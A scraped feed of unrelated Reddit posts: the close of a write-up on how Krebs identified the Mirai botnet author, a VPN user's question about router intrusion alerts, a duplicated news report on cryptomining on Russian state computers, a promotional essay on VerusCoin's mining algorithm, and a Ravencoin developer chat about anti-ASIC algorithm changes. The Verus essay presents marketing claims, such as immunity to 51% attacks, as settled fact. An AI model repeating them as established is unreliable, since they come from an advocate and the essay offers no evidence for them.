As research on the Mirai botnet grew, and more malware authors incorporated parts of Mirai's source code into their own attacks, attention on the botnet increased, and on the people behind it. The attention was presumably the reason why Hackforums, the forum where the source code was posted, later disallowed ostensible "Server Stress Tester" services from being sold on it. By December, "Operation Tarpit" had wrought 34 arrests and over a hundred "knock and talk" interviews questioning people about their involvement.
By January, things started to come crashing down. Krebs published an extensive exposé on Anna-senpai detailing all the evidence linking them to the creation of Mirai. The post was so big, he included a damn glossary. What sparked the largest botnet the internet had ever seen? Minecraft. Minecraft servers are big business. A popular one can earn tens of thousands of dollars per month from people buying powers, building space, or other things. It's also a fiercely competitive business, with hundreds of servers vying for players. It turns out that things may have started, as with another set of companies, two rival DDOS mitigation providers competing for customers. ProTraf was a provider of such mitigation technology, and a company whose owner later worked for ProTraf had on at least one occasion hijacked addresses belonging to another company, ProxyPipe. ProxyPipe had also been hit with DDOS attacks they suspected to be launched by ProTraf.
While looking into the President of ProTraf, Krebs realized he'd seen the relatively uncommon combination of programming languages and skills posted by the President somewhere else. They were shared by Anna-senpai on Hackforums. As Krebs dug deeper and deeper into Anna-senpai's online presence, he uncovered other usernames, including one he traced to some Minecraft forums where a photoshopped picture of a still from Pulp Fiction contained the faces of BackConnect, which was a rival to ProTraf's DDOS mitigation business, and another face. A hacker by the name of Vyp0r, who another employee of ProTraf claimed betrayed his trust and blackmailed him into posting the source of another piece of malware called Bashlite. There was also a third character photoshopped into the image. An anime character named "Yamada" from a movie called B Gata H Hei.
Interestingly, under the same username, Krebs found a "MyAnimeList" profile which, out of 9 titles it had marked as watched, were B Gata H Hei, as well as Mirai Nikki, the show from which Mirai derived its name. It continues on with other evidence, including DDOS attacks against Rutgers University, but in short, there was little doubt in the identity of "Anna-senpai", but the person behind the identity did contact Krebs to comment. He denied any involvement in Mirai or DDOS attacks.
"I don’t think there are enough facts to definitively point the finger at me," [Anna-senpai] said. "Besides this article, I was pretty much a nobody. No history of doing this kind of stuff, nothing that points to any kind of sociopathic behavior. Which is what the author is, a sociopath."
He did, however, correct Krebs on the name of B Gata H Kei.
Epilogue
Needless to say, the Mirai botnet crew was caught, but managed to avoid jailtime thanks to their cooperation with the government. That's not to say they went unpunished. Anna-senpai was sentenced to 6 months confinement, 2500 hours of community service, and they may have to pay up to $8.6 million in restitution for their attacks on Rutgers university.

Other Stories

I don't have the time or energy to write another effortpost, and as is I'm over 20,000 characters, so here's a few other tidbits of Krebs' clashes with miscreants.
submitted by HereComesMyDingDong to internetdrama [link] [comments]

Intrusion Alerts to actual IP even when connected to VPN

So I've been a NordVPN customer since July of '17 and have experienced what I consider the best protection, confidence in anonymity, as well as ease of use. That said, there's a lot I don't understand. The reason for this post is because I'm being alerted of some ip addresses known for bad behavior, being blocked by my router. I'm getting A LOT of alerts and I don't know if it's normal or not. The curious thing is that the in the alert the DESTINATION is my public IP address from my provider.
Basically, someone's knocking on the doors of my real public IP address and I need to assess the threat. How can that be when I have NordVPN and my real IP address is supposed to be blocked?
Details on the intrusion, if it matters: Asus Router AC-3200
The Two-Way Intrusion Prevention System protects any device connected to the network from spam or DDoS attacks. It also blocks malicious incoming packets to protect your router from network vulnerability attacks, such as Shellshocked, Heartbleed, Bitcoin mining, and ransomware. Additionally, Two-Way IPS detects suspicious outgoing packets from infected devices and avoids botnet attacks.
The Exploits Blocked:
Exploit netcore router backdoor access
Exploit Remote Command Execution via shell script -2
submitted by Thilky to nordvpn [link] [comments]

2 Russian Nationals Charged With Mining Crypto on State Computers

Two Russian nationals are being prosecuted for allegedly crypto mining on Russian government-owned computer systems, state news agency TASS reported Monday.
"In Russia, there have been two cases recently when people were brought to criminal responsibility for getting access to computers [of state organizations] and using them to mine cryptocurrencies," TASS quotes Nikolay Murashov, deputy director of the National Coordination Center for Computer Incidents, as saying during a press conference.
According to the TASS report, one of the nationals is a resident of Kurgan who used almost a whole botnet in various regions of the country. A criminal case was initiated against a second national for using the site of JSC Rostovvodokanal for mining. The report gives few other details but quotes Murashov as saying the attackers "infected" web pages and mined crypto currency at the moment the pages were viewed in the browser.
Murashov said companies must be on the lookout for suspicious activity on their networks, even if no activity is immediately detected.
"Up to 80 percent of the computer’s free power can be used to generate virtual coins, and a legitimate user may not even know about it," he said.
Unsanctioned crypto mining schemes have flourished in Russia. County governments have found operations lurking on their servers, as have airports and oil transport companies.
In October, three nuclear scientists were convicted and penalized for illegally mining bitcoin in the Sarov lab, where the former Soviet Union developed its first nuclear bombs.
The government claims crypto mining is widespread. In 2017 a top technology advisor to President Vladimir Putin estimated that 20 percent to 30 percent of devices “are infected with” crypto mining viruses.
Russian cybersecurity experts and some in the government have called that figure bogus.
submitted by SilkChain to SilkNews [link] [comments]

2 Russian Nationals Charged With Mining Crypto on State Computers

Two Russian nationals are being prosecuted for allegedly crypto mining on Russian government-owned computer systems, state news agency TASS reported Monday.
"In Russia, there have been two cases recently when people were brought to criminal responsibility for getting access to computers [of state organizations] and using them to mine cryptocurrencies," TASS quotes Nikolay Murashov, deputy director of the National Coordination Center for Computer Incidents, as saying during a press conference.
According to the TASS report, one of the nationals is a resident of Kurgan who used almost a whole botnet in various regions of the country. A criminal case was initiated against a second national for using the site of JSC Rostovvodokanal for mining. The report gives few other details but quotes Murashov as saying the attackers "infected" web pages and mined crypto currency at the moment the pages were viewed in the browser.
Murashov said companies must be on the lookout for suspicious activity on their networks, even if no activity is immediately detected.
"Up to 80 percent of the computer’s free power can be used to generate virtual coins, and a legitimate user may not even know about it," he said.
Unsanctioned crypto mining schemes have flourished in Russia. County governments have found operations lurking on their servers, as have airports and oil transport companies.
In October, three nuclear scientists were convicted and penalized for illegally mining bitcoin in the Sarov lab, where the former Soviet Union developed its first nuclear bombs.
The government claims crypto mining is widespread. In 2017 a top technology advisor to President Vladimir Putin estimated that 20 percent to 30 percent of devices “are infected with” crypto mining viruses.
Russian cybersecurity experts and some in the government have called that figure bogus.
submitted by SilkChain to u/SilkChain [link] [comments]

The Problem with PoW

The Problem with PoW
Miners have always had it rough..
"Frustrated Miners"

The Problem with PoW
(and what is being done to solve it)

Proof of Work (PoW) is one of the most commonly used consensus mechanisms entrusted to secure and validate many of today’s most successful cryptocurrencies, Bitcoin being one. Battle-hardened and having weathered the test of time, Bitcoin has demonstrated the undeniable strength and reliability of the PoW consensus model through sheer market saturation, and of course, its persistency.
In addition to the cost of powerful computing hardware, miners prove that they are benefiting the network by expending energy in the form of electricity, by solving and hashing away complex math problems on their computers, utilizing any suitable tools that they have at their disposal. The mathematics involved in securing proof of work revolve around unique algorithms, each with their own benefits and vulnerabilities, and can require different software/hardware to mine depending on the coin.
Because each block has a unique and entirely random hash, or “puzzle” to solve, the “work” has to be performed for each block individually and the difficulty of the problem can be increased as the speed at which blocks are solved increases.

Hashrates and Hardware Types

While proof of work is an effective means of securing a blockchain, it inherently promotes competition amongst miners seeking higher and higher hashrates due to the rewards earned by the node who wins the right to add the next block. In turn, these higher hash rates benefit the blockchain, providing better security when it’s a result of a well distributed/decentralized network of miners.
When Bitcoin first launched its genesis block, it was mined exclusively by CPUs. Over the years, various programmers and developers have devised newer, faster, and more energy efficient ways to generate higher hashrates; some by perfecting the software end of things, and others, when the incentives are great enough, create expensive specialized hardware such as ASICs (application-specific integrated circuit). With the express purpose of extracting every last bit of hashing power, efficiency being paramount, ASICs are stripped down, bare minimum, hardware representations of a specific coin’s algorithm.
This gives ASICS a massive advantage in terms of raw hashing power and also in terms of energy consumption against CPUs/GPUs, but with significant drawbacks of being very expensive to design/manufacture, translating to a high economic barrier for the casual miner. Due to the fact that they are virtual hardware representations of a single targeted algorithm, this means that if a project decides to fork and change algorithms suddenly, your powerful brand-new ASIC becomes a very expensive paperweight. The high costs in developing and manufacturing ASICs and the associated risks involved, make them unfit for mass adoption at this time.
Somewhere on the high end, in the vast hashrate expanse created between GPU and ASIC, sits the FPGA (field programmable gate array). FPGAs are basically ASICs that make some compromises with efficiency in order to have more flexibility, namely they are reprogrammable and often used in the “field” to test an algorithm before implementing it in an ASIC. As a precursor to the ASIC, FPGAs are somewhat similar to GPUs in their flexibility, but require advanced programming skills and, like ASICs, are expensive and still fairly uncommon.

2 Guys 1 ASIC

One of the issues with proof of work incentivizing the pursuit of higher hashrates is in how the network calculates block reward coinbase payouts and rewards miners based on the work that they have submitted. If a coin generated, say a block a minute, and this is a constant, then what happens if more miners jump on a network and do more work? The network cannot pay out more than 1 block reward per 1 minute, and so a difficulty mechanism is used to maintain balance. The difficulty will scale up and down in response to the overall nethash, so if many miners join the network, or extremely high hashing devices such as ASICs or FPGAs jump on, the network will respond accordingly, using the difficulty mechanism to make the problems harder, effectively giving an edge to hardware that can solve them faster, balancing the network. This not only maintains the block a minute reward but it has the added side-effect of energy requirements that scale up with network adoption.
Imagine, for example, if one miner gets on a network all alone with a CPU doing 50 MH/s and is getting all 100 coins that can possibly be paid out in a day. Then, if another miner jumps on the network with the same CPU, each miner would receive 50 coins in a day instead of 100 since they are splitting the required work evenly, despite the fact that the net electrical output has doubled along with the work. Electricity costs miner’s money and is a factor in driving up coin price along with adoption, and since more people are now mining, the coin is less centralized. Now let’s say a large corporation has found it profitable to manufacture an ASIC for this coin, knowing they will make their money back mining it or selling the units to professionals. They join the network doing 900 MH/s and will be pulling in 90 coins a day, while the two guys with their CPUs each get 5 now. Those two guys aren’t very happy, but the corporation is. Not only does this negatively affect the miners, it compromises the security of the entire network by centralizing the coin supply and hashrate, opening the doors to double spends and 51% attacks from potential malicious actors. Uncertainty of motives and questionable validity in a distributed ledger do not mix.
When technology advances in a field, it is usually applauded and welcomed with open arms, but in the world of crypto things can work quite differently. One of the glaring flaws in the current model and the advent of specialized hardware is that it’s never ending. Suppose the two men from the rather extreme example above took out a loan to get themselves that ASIC they heard about that can get them 90 coins a day? When they join the other ASIC on the network, the difficulty adjusts to keep daily payouts consistent at 100, and they will each receive only 33 coins instead of 90 since the reward is now being split three ways. Now what happens if a better ASIC is released by that corporation? Hopefully, those two guys were able to pay off their loans and sell their old ASICs before they became obsolete.
This system, as it stands now, only perpetuates a never ending hashrate arms race in which the weapons of choice are usually a combination of efficiency, economics, profitability and in some cases control.

Implications of Centralization

This brings us to another big concern with expensive specialized hardware: the risk of centralization. Because they are so expensive and inaccessible to the casual miner, ASICs and FPGAs predominantly remain limited to a select few. Centralization occurs when one small group or a single entity controls the vast majority hash power and, as a result, coin supply and is able to exert its influence to manipulate the market or in some cases, the network itself (usually the case of dishonest nodes or bad actors).
This is entirely antithetical of what cryptocurrency was born of, and since its inception many concerted efforts have been made to avoid centralization at all costs. An entity in control of a centralized coin would have the power to manipulate the price, and having a centralized hashrate would enable them to affect network usability, reliability, and even perform double spends leading to the demise of a coin, among other things.
The world of crypto is a strange new place, with rapidly growing advancements across many fields, economies, and boarders, leaving plenty of room for improvement; while it may feel like a never-ending game of catch up, there are many talented developers and programmers working around the clock to bring us all more sustainable solutions.

The Rise of FPGAs

With the recent implementation of the commonly used coding language C++, and due to their overall flexibility, FPGAs are becoming somewhat more common, especially in larger farms and in industrial setting; but they still remain primarily out of the hands of most mining enthusiasts and almost unheard of to the average hobby miner. Things appear to be changing though, one example of which I’ll discuss below, and it is thought by some, that soon we will see a day when mining with a CPU or GPU just won’t cut it any longer, and the market will be dominated by FPGAs and specialized ASICs, bringing with them efficiency gains for proof of work, while also carelessly leading us all towards the next round of spending.
A perfect real-world example of the effect specialized hardware has had on the crypto-community was recently discovered involving a fairly new project called VerusCoin and a fairly new, relatively more economically accessible FPGA. The FPGA is designed to target specific alt-coins whose algo’s do not require RAM overhead. It was discovered the company had released a new algorithm, kept secret from the public, which could effectively mine Verus at 20x the speed of GPUs, which were the next fastest hardware types mining on the Verus network.
Unfortunately this was done with a deliberately secret approach, calling the Verus algorithm “Algo1” and encouraging owners of the FPGA to never speak of the algorithm in public channels, admonishing a user when they did let the cat out of the bag. The problem with this business model is that it is parasitic in nature. In an ecosystem where advancements can benefit the entire crypto community, this sort of secret mining approach also does not support the philosophies set forth by the Bitcoin or subsequent open source and decentralization movements.
Although this was not done in the spirit of open source, it does hint to an important step in hardware innovation where we could see more efficient specialized systems within reach of the casual miner. The FPGA requires unique sets of data called a bitstream in order to be able to recognize each individual coin’s algorithm and mine them. Because it’s reprogrammable, with the support of a strong development team creating such bitstreams, the miner doesn’t end up with a brick if an algorithm changes.

All is not lost thanks to.. um.. Technology?

Shortly after discovering FPGAs on the network, the Verus developers quickly designed, tested, and implemented a new, much more complex and improved algorithm via a fork that enabled Verus to transition smoothly from VerusHash 1.0 to VerusHash 2.0 at block 310,000. Since the fork, VerusHash 2.0 has demonstrated doing exactly what it was designed for- equalizing hardware performance relative to the device being used while enabling CPUs (the most widely available “ASICs”) to mine side by side with GPUs, at a profit and it appears this will also apply to other specialized hardware. This is something no other project has been able to do until now. Rather than pursue the folly of so many other projects before it- attempting to be “ASIC proof”, Verus effectively achieved and presents to the world an entirely new model of “hardware homogeny”. As the late, great, Bruce Lee once said- “Don’t get set into one form, adapt it and build your own, and let it grow, be like water.”
In the design of VerusHash 2.0, Verus has shown it doesn’t resist progress like so many other new algorithms try to do, it embraces change and adapts to it in the way that water becomes whatever vessel it inhabits. This new approach- an industry first- could very well become an industry standard and in doing so, would usher in a new age for proof of work based coins. VerusHash 2.0 has the potential to correct the single largest design flaw in the proof of work consensus mechanism- the ever expanding monetary and energy requirements that have plagued PoW based projects since the inception of the consensus mechanism. Verus also solves another major issue of coin and net hash centralization by enabling legitimate CPU mining, offering greater coin and hashrate distribution.
Digging a bit deeper it turns out the Verus development team are no rookies. The lead developer Michael F Toutonghi has spent decades in the field programming and is a former Vice President and Technical Fellow at Microsoft, recognized founder and architect of Microsoft's .Net platform, ex-Technical Fellow of Microsoft's advertising platform, ex-CTO, Parallels Corporation, and an experienced distributed computing and machine learning architect. The project he helped create employs and makes use of a diverse myriad of technologies and security features to form one of the most advanced and secure cryptocurrency to date. A brief description of what makes VerusCoin special quoted from a community member-
"Verus has a unique and new consensus algorithm called Proof of Power which is a 50% PoW/50% PoS algorithm that solves theoretical weaknesses in other PoS systems (Nothing at Stake problem for example) and is provably immune to 51% hash attacks. With this, Verus uses the new hash algorithm, VerusHash 2.0. VerusHash 2.0 is designed to better equalize mining across all hardware platforms, while favoring the latest CPUs over older types, which is also one defense against the centralizing potential of botnets. Unlike past efforts to equalize hardware hash-rates across different hardware types, VerusHash 2.0 explicitly enables CPUs to gain even more power relative to GPUs and FPGAs, enabling the most decentralizing hardware, CPUs (due to their virtually complete market penetration), to stay relevant as miners for the indefinite future. As for anonymity, Verus is not a "forced private", allowing for both transparent and shielded (private) transactions...and private messages as well"

If other projects can learn from this and adopt a similar approach or continue to innovate with new ideas, it could mean an end to all the doom and gloom predictions that CPU and GPU mining are dead, offering a much needed reprieve and an alternative to miners who have been faced with the difficult decision of either pulling the plug and shutting down shop or breaking down their rigs to sell off parts and buy new, more expensive hardware…and in so doing present an overall unprecedented level of decentralization not yet seen in cryptocurrency.
Technological advancements led us to the world of secure digital currencies and the progress being made with hardware efficiencies is indisputably beneficial to us all. ASICs and FPGAs aren’t inherently bad, and there are ways in which they could be made more affordable and available for mass distribution. More than anything, it is important that we work together as communities to find solutions that can benefit us all for the long term.

In an ever changing world where it may be easy to lose sight of the real accomplishments that brought us to this point one thing is certain, cryptocurrency is here to stay and the projects that are doing something to solve the current problems in the proof of work consensus mechanism will be the ones that lead us toward our collective vision of a better world- not just for the world of crypto but for each and every one of us.
submitted by Godballz to CryptoCurrency [link] [comments]

Transcript of Open Developer Meeting in Discord - 7/19/2019

[Dev-Happy] BlondfrogsLast Friday at 3:58 PM
Hey everyone. The channel is now open for the dev meeting.
LSJI07 - MBITLast Friday at 3:58 PM
Hi
TronLast Friday at 3:59 PM
Hi all!
JerozLast Friday at 3:59 PM
:wave:
TronLast Friday at 3:59 PM
Topics: Algo stuff - x22rc, Ownership token for Restricted Assets and Assets.
JerozLast Friday at 4:00 PM
@Milo is also here from coinrequest.
MiloLast Friday at 4:00 PM
Hi :thumbsup:
Pho3nix Monk3yLast Friday at 4:00 PM
welcome, @Milo
TronLast Friday at 4:00 PM
Great.
@Milo Was there PRs for Android and iOS?
MiloLast Friday at 4:01 PM
Yes, I've made a video. Give me a second I'll share it asap.
JerozLast Friday at 4:02 PM
I missed the iOS one.
MiloLast Friday at 4:02 PM
Well its 1 video, but meant for all.
JerozLast Friday at 4:02 PM
Ah, there's an issue but no pull request (yet?)
https://github.com/RavenProject/ravenwallet-ios/issues/115
[Dev-Happy] BlondfrogsLast Friday at 4:03 PM
nice @Milo
MiloLast Friday at 4:04 PM
Can it be that I have no video post rights?
JerozLast Friday at 4:05 PM
In discord?
MiloLast Friday at 4:05 PM
yes?
[Dev-Happy] BlondfrogsLast Friday at 4:05 PM
just a link?
JerozLast Friday at 4:05 PM
Standard version has a file limit afaik
Pho3nix Monk3yLast Friday at 4:05 PM
try now
gave permissions
MiloLast Friday at 4:05 PM
it's not published yet on Youtube, since I didn't knew when it would be published in the wallets
file too big. Hold on i'll put it on youtube and set it on private
LSJI07 - MBITLast Friday at 4:06 PM
no worries ipfs it...:yum:
Pho3nix Monk3yLast Friday at 4:06 PM
ok, just send link when you can
[Dev-Happy] BlondfrogsLast Friday at 4:07 PM
So guys. We released Ravencoin v2.4.0!
JerozLast Friday at 4:08 PM
If you like the code. Go update them nodes! :smiley:
[Dev-Happy] BlondfrogsLast Friday at 4:08 PM
We are recommending that you are upgrading to it. It fixes a couple bugs in the code base inherited from bitcoin!
MiloLast Friday at 4:08 PM
https://www.youtube.com/watch?v=t\_g7NpFXm6g&feature=youtu.be
sorry for the hold up
YouTube
Coin Request
Raven dev Gemiddeld
LSJI07 - MBITLast Friday at 4:09 PM
thanks short and sweet!!
KAwARLast Friday at 4:10 PM
Is coin request live on the android wallet?
TronLast Friday at 4:10 PM
Nice video.
It isn't in the Play Store yet.
Pho3nix Monk3yLast Friday at 4:10 PM
Well, this is the first time in a while where we have this many devs online. What questions do y'all have?
LSJI07 - MBITLast Friday at 4:11 PM
Algo questions?
Pho3nix Monk3yLast Friday at 4:11 PM
sure
KAwARLast Friday at 4:11 PM
KK
LSJI07 - MBITLast Friday at 4:12 PM
what are the proposed 22 algos in x22r? i could only find the original 16 plus 5 on x21.
TronLast Friday at 4:12 PM
Likely the 5 from x21 and find one more.
We need to make sure they're all similar in time profile.
liqdmetalLast Friday at 4:14 PM
should we bother fixing a asic-problem that we dont know exists for sure or not?
TronLast Friday at 4:14 PM
That's the 170 million dollar question.
[Dev-Happy] BlondfrogsLast Friday at 4:14 PM
I would prefer to be proactive not reactive.
imo
JerozLast Friday at 4:14 PM
same
LSJI07 - MBITLast Friday at 4:15 PM
RIPEMD160 is a golden oldie but not sure on hash speed compared to the others.
liqdmetalLast Friday at 4:15 PM
in my mind we should focus on the restricted messaging etc
Sevvy (y rvn pmp?)Last Friday at 4:15 PM
probably won't know if the action was needed until after you take the action
liqdmetalLast Friday at 4:15 PM
we are at risk of being interventionistas
acting under opacity
TronLast Friday at 4:15 PM
Needs to spit out at least 256 bit. Preferably 512 bit.
LSJI07 - MBITLast Friday at 4:15 PM
ok
TronLast Friday at 4:15 PM
If it isn't 512 bit, it'll cause some extra headache for the GPU mining software.
liqdmetalLast Friday at 4:16 PM
i seek to avoid iatrogenics
TronLast Friday at 4:16 PM
Similar to the early problems when all the algos except the first one were built for 64-bytes (512-bit) inputs.
Had to look that one up. TIL iatrogenics
JerozLast Friday at 4:17 PM
I have to google most of @liqdmetal's vocabulary :smile:
liqdmetalLast Friday at 4:17 PM
@Tron tldr: basically the unseen, unintended negative side effects of the asic "cure"
Sevvy (y rvn pmp?)Last Friday at 4:18 PM
10 dolla word
liqdmetalLast Friday at 4:19 PM
we need a really strong case to intervene in what has been created.
TronLast Friday at 4:19 PM
I agree. I'm less concerned with the technical risk than I am the potential split risk experienced multiple times by Monero.
Sevvy (y rvn pmp?)Last Friday at 4:20 PM
tron do you agree that forking the ravencoin chain presents unique risks compared to other chains that aren't hosting assets?
JerozLast Friday at 4:21 PM
Yes, if you fork, you need to figure out for each asset which one you want to support.
Sevvy (y rvn pmp?)Last Friday at 4:21 PM
yeah. and the asset issuer could have a chain preference
TronLast Friday at 4:22 PM
@Sevvy (y rvn pmp?) Sure. Although, I'd expect that the asset issuers will be honor the assets on the dominant chain. Bigger concern is the branding confusion of multiple forks. See Bitcoin, Bitcoin Cash, Bitcoin SV for an example. We know they're different, but do non-crypto folks?
Hans_SchmidtLast Friday at 4:22 PM
I thought that the take-away from the recently published analyses and discussions was that ASICs for RVN may be active, but if so then they are being not much more effective than GPUs.
Sevvy (y rvn pmp?)Last Friday at 4:22 PM
agreed on all accounts there tron
TronLast Friday at 4:23 PM
I'm not yet convinced ASICs are on the network.
KAwARLast Friday at 4:23 PM
It would be better to damage an asic builder by forking after they made major expenses. Creating for them the type of deficit that could be negated by just buying instead of mining. Asic existence should be 100 percent confirmed before fork.
liqdmetalLast Friday at 4:23 PM
170million dollar question is right.lol
TronLast Friday at 4:24 PM
I've had someone offer to connect me to the folks at Fusion Silicon.
Sevvy (y rvn pmp?)Last Friday at 4:25 PM
yes. and if they are active on the network they are not particularly good ASICs
which makes it a moot point probably
TronLast Friday at 4:26 PM
The difficult part of this problem is that by the time everyone agrees that ASICs are problematic on the network, then voting the option in is likely no longer an option.
Sevvy (y rvn pmp?)Last Friday at 4:26 PM
yes. part of me wonders if we would say "okay, the clock on the asic countdown is reset by this new algo. but now the race is on"
[Dev-Happy] BlondfrogsLast Friday at 4:26 PM
There are always risks when making a change that will fork the network. We want wait to long though, as tron said. It wont be a voting change. it will be a mandatory change at a block number.
Sevvy (y rvn pmp?)Last Friday at 4:26 PM
acknowledge the inevitable
MiloLast Friday at 4:27 PM
I had just a small question from my side. When do you think the android version would be published, and do you maybe have a time-frame for the others?
TronLast Friday at 4:27 PM
Quick poll. How would everyone here feel about a BIP9 option - separate from the new features that can be voted in?
KAwARLast Friday at 4:27 PM
Maybe voting should not be a strictly blockchain vote. A republic and a democratic voice?
[Dev-Happy] BlondfrogsLast Friday at 4:27 PM
@Milo We can try and get a beta out next week, and publish soon after that.
MiloLast Friday at 4:28 PM
@[Dev-Happy] Blondfrogs :thumbsup::slight_smile:
[Dev-Happy] BlondfrogsLast Friday at 4:28 PM
BIP9 preemptive vote. I like it.
TronLast Friday at 4:30 PM
The advantage to a BIP9 vote is that it puts the miners and mining pools at a clear majority before activation.
LSJI07 - MBITLast Friday at 4:30 PM
Centralisation is inevitable unless we decide to resist it. ASIC's are market based and know the risks and rewards possible. A key step in resisting is sending a message. An algo change to increase asic resistance is imho a strong message. A BIP9 vote now would also be an indicator of bad actors early....
TronLast Friday at 4:30 PM
The disadvantage is that it may not pass if the will isn't there.
LSJI07 - MBITLast Friday at 4:30 PM
Before assets are on main net and cause additional issues.
KAwARLast Friday at 4:31 PM
I am not schooled in coding to have an educated voice. I only understand social problems and how it affects the economy.
SpyderDevLast Friday at 4:31 PM
All are equal on RVN
TronLast Friday at 4:31 PM
It is primarily a social problem. The tech change is less risky and is easier than the social.
LSJI07 - MBITLast Friday at 4:32 PM
All can have a share....people who want more of a share however pay for the privilege and associated risks.
KAwARLast Friday at 4:33 PM
Assets and exchange listings need to be consistent and secure.
brutoidLast Friday at 4:36 PM
I'm still not entirely clear on what the overall goal to the algo change is? Is it just to brick the supposed ASICs (unknown 45%) which could still be FPGAs as seen from the recent block analysis posted in the nest. Is the goal to never let ASICs on? Is it to brick FPGAs ultimately. Are we making Raven strictly GPU only? I'm still unclear
LSJI07 - MBITLast Friday at 4:37 PM
What about the future issue of ASICs returning after a BIP9 fork "soon"? Are all following the WP as a community? i.e asic resistant or are we prepared to change that to asic resistant for early coin emission. Ideally we should plan for the future. Could the community make a statement that no future algo changes will be required to incentivise future public asic manufacturers?
Lol. Same question @brutoid
brutoidLast Friday at 4:37 PM
Haha it is
You mind-beamed me!
[Dev-Happy] BlondfrogsLast Friday at 4:38 PM
The is up to the community.
Currently, the feel seems like the community is anti asic forever.
The main issue is getting people to upgrade.
KAwARLast Friday at 4:38 PM
Clarity is important. Otherwise we are attacking windmills like Don Quixote.
brutoidLast Friday at 4:39 PM
I'm not getting the feeling of community ASIC hate if the last few weeks of discussion are anything to go by?
Hans_SchmidtLast Friday at 4:39 PM
A unilateral non-BIP9 change at a chosen block height is a serious thing, but anti-ASIC has been part of the RVN philosophy since the whitepaper and is therefore appropriate for that purpose.
[Dev-Happy] BlondfrogsLast Friday at 4:39 PM
We can use the latest release as an example. It was a non forking release, announced for 2 weeks. and only ~30% of the network has upgraded.
TronLast Friday at 4:39 PM
@Hans_Schmidt Well said.
liqdmetalLast Friday at 4:40 PM
I'm not concerned about a "asic hardware problem" so much as I believe it more likely what we are seeing is several big fish miners (perhaps a single really big fish). For now I recommend standing pat on x16r. In the future I can see an algo upgrade fork to keep the algo up to date. If we start fighting against dedicated x16r hashing machines designed and built to secure our network we are more likely to go down in flames. The custom SHA256 computers that make the bitcoin the most secure network in existence are a big part of that security. If some party has made an asic that performs up to par or better than FPGA or GPU on x16r, that is a positive for this network, a step towards SHA256 security levels. It is too bad the community is in the dark regarding their developments. Therefore I think the community has to clarify its stance towards algorithm changes. I prefer a policy that will encourage the development of mining software, bitstreams and hardware by as many parties as possible. The imminent threat of ALGO fork screws the incentive up for developers.
JerozLast Friday at 4:40 PM
@brutoid the vocal ones are lenient towards asics, but the outcome of the 600+ votes seemed pretty clear.
brutoidLast Friday at 4:40 PM
This is my confusion
TronLast Friday at 4:41 PM
More hashes are only better if the cost goes up proportionally. Machines that do more hashes for less $ doesn't secure the network more, and trends towards centralization.
JerozLast Friday at 4:41 PM
I would argue for polling ever so often as it certainly will evolve dynamically with the state of crypto over time.
TronLast Friday at 4:41 PM
Measure security in two dimensions. Distribution, and $/hash.
liqdmetalLast Friday at 4:41 PM
and volume of hash
traysiLast Friday at 4:42 PM
45% of the hashrate going to one party is unhealthy, and standing pat on x16r just keeps that 45% where it is.
TronLast Friday at 4:42 PM
Volume doesn't matter if the cost goes down. For example, lets say software shows up that does 1000x better than the software from yesterday, and everyone moves to it. That does not add security. Even if the "difficulty" and embedded hashes took 1000x more attempts to find.
brutoidLast Friday at 4:42 PM
My issue is defintely centralization of hash and not so much what machine is doing it. I mine with both GPU and FPGA. Of course, the FPGAs are not on raven
TJayLast Friday at 4:44 PM
easy solution is just to replace a few of 16 current hash functions, without messing with x21r or whatever new shit
TronLast Friday at 4:44 PM
How do folks here feel about allowing CPUs back in the game?
traysiLast Friday at 4:44 PM
Botnets is my concern with CPUs
brutoidLast Friday at 4:44 PM
Botnets is my concern
SpyderDevLast Friday at 4:44 PM
Yes please.
LSJI07 - MBITLast Friday at 4:44 PM
the poll votes seem not very security conscious. More of day miners chasing profits. I love them bless! Imho the future is bright for raven, however these issues if not sorted out now will bite hard long term when asset are on the chain and gpu miners are long gone.....
ZaabLast Friday at 4:45 PM
How has the testing of restricted assets been on the test net?
liqdmetalLast Friday at 4:45 PM
Agreed. I dont think x16r is obsolete like that yet however
[Dev-Happy] BlondfrogsLast Friday at 4:45 PM
@Zaab not enough testing at the moment.
HedgerLast Friday at 4:45 PM
Yes, how is the Testing going?
justinjjaLast Friday at 4:45 PM
Like randomX or how are cpus going to be back in the game?
TronLast Friday at 4:45 PM
@Zaab Just getting started at testing at the surface level (RPC calls), and fixing as we go.
ZaabLast Friday at 4:45 PM
And or any updates on the review of dividend code created by the community
Lokar -=Kai=-Last Friday at 4:45 PM
if the amount of hash the unknown pool has is fixed as standarderror indicated then waiting for the community of FPGAers to get onto raven might be advantageous if the fork doesn't hurt FPGAs.
ZaabLast Friday at 4:45 PM
Can't rememeber who was on it
SpyderDevLast Friday at 4:45 PM
@Zaab But we are working on it...
Lokar -=Kai=-Last Friday at 4:46 PM
more hash for votes
JerozLast Friday at 4:46 PM
@Maldon is, @Zaab
TronLast Friday at 4:46 PM
@Zaab There are unit tests and functional tests already, but we'd like more.
[Dev-Happy] BlondfrogsLast Friday at 4:46 PM
@Zaab Dividend code is currently adding test cases for better security. Should have more update on that next meeting
KAwARLast Friday at 4:46 PM
Absolute democracy seems to resemble anarchy or at least civil war. In EVE online they have a type of community voice that get voted in by the community.
ZaabLast Friday at 4:46 PM
No worries was just curious if it was going as planned or significant issues were being found
Obviously some hiccups are expected
More testing is always better!
TronLast Friday at 4:47 PM
Who in here is up for a good civil war? :wink:
ZaabLast Friday at 4:47 PM
Tron v Bruce. Celebrity fight night with proceeds to go to the RVN dev fund
SpyderDevLast Friday at 4:48 PM
Cagefight or mudpit?
JerozLast Friday at 4:48 PM
talking about dev funds..... :wink:
Pho3nix Monk3yLast Friday at 4:49 PM
and there goes the conversation....
KAwARLast Friday at 4:49 PM
I am trying to be serious...
ZaabLast Friday at 4:49 PM
Sorry back to the ascii topic!
traysiLast Friday at 4:49 PM
@Tron What do we need in order to make progress toward a decision on the algo? Is there a plan or a roadmap of sorts to get us some certainty about what we're going to do?
LSJI07 - MBITLast Friday at 4:50 PM
Could we have 3 no BIP9 votes? No1 Friendly to asics, retain status quo. No2 change to x17r minimal changes etc, with no additional future PoW/algo upgrades. No3. Full Asic resistance x22r and see what happens...
:thonk~1:
Sounds messy....
TronLast Friday at 4:51 PM
Right now we're in research mode. We're building CNv4 so we can run some metrics. If that goes well, we can put together x22rc and see how it performs. It will likely gore everyone's ox. CPUs can play, GPUs work, but aren't dominant. ASICs VERY difficult, and FPGAs will have a tough time.
ZaabLast Friday at 4:51 PM
Yeah i feel like the results would be unreliable
TronLast Friday at 4:51 PM
Is this good, or do we lose everyone's vote?
PlayHardLast Friday at 4:52 PM
Fpga will be dead
Lokar -=Kai=-Last Friday at 4:52 PM
